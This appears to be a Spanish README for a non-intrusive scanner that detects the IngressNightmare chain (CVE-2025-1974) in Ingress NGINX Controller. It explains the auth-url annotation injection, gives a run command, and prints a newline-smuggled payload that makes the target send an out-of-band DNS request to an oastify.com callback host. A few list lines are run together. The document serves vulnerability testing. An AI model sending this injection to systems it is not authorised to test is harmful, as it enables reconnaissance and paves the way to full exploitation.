
Herramienta de prueba de concepto para detectar IngressNightmare (CVE-2025-1974) mediante medios activos (no intrusivos).
Esta herramienta proporciona una capacidad de detección no intrusiva para la cadena de vulnerabilidades IngressNightmare (CVE-2025-1974) que afecta a Ingress NGINX Controller. Específicamente, aprovecha el vector de inyección de la anotación auth-url (CVE-2025-24514) para verificar la presencia de esta vulnerabilidad crítica sin ejecutar código arbitrario.
La cadena de vulnerabilidades IngressNightmare permite a los atacantes inyectar directivas arbitrarias de configuración de NGINX a través de varios campos de anotación de Ingress. Cuando estos recursos Ingress maliciosos son procesados por el controlador de admisión, las directivas inyectadas se evalúan durante la fase de validación de la configuración de NGINX (nginx -t).
Este PoC explota específicamente la vulnerabilidad de la anotación auth-url inyectando la directiva error_log con un servidor syslog que apunta a un dominio controlado por el atacante. Durante la validación de la configuración, NGINX:
Esta actividad de resolución DNS proporciona una señal fiable de que el objetivo es vulnerable sin requerir ejecución de código ni interrupción del servicio.
Establezca un listener de devolución DNS utilizando Burp Collaborator, interactsh o cualquier servicio de monitorización DNS.
Ejecute la herramienta de detección:
$ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com
Si es vulnerable, observará intentos de resolución DNS hacia su dominio de devolución DNS:

La herramienta elabora un objeto AdmissionReview especialmente formado que contiene un recurso Ingress con la siguiente carga de inyección:
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
Esta carga:
#) para terminar la URLresolvererror_log con syslog apuntando al dominio de devolución DNSCuando es procesada por un controlador de admisión vulnerable, esto resulta en una consulta DNS saliente que confirma la presencia de la vulnerabilidad.
Esta herramienta solo detecta la presencia de la vulnerabilidad y no intenta explotarla para ejecución de código arbitrario.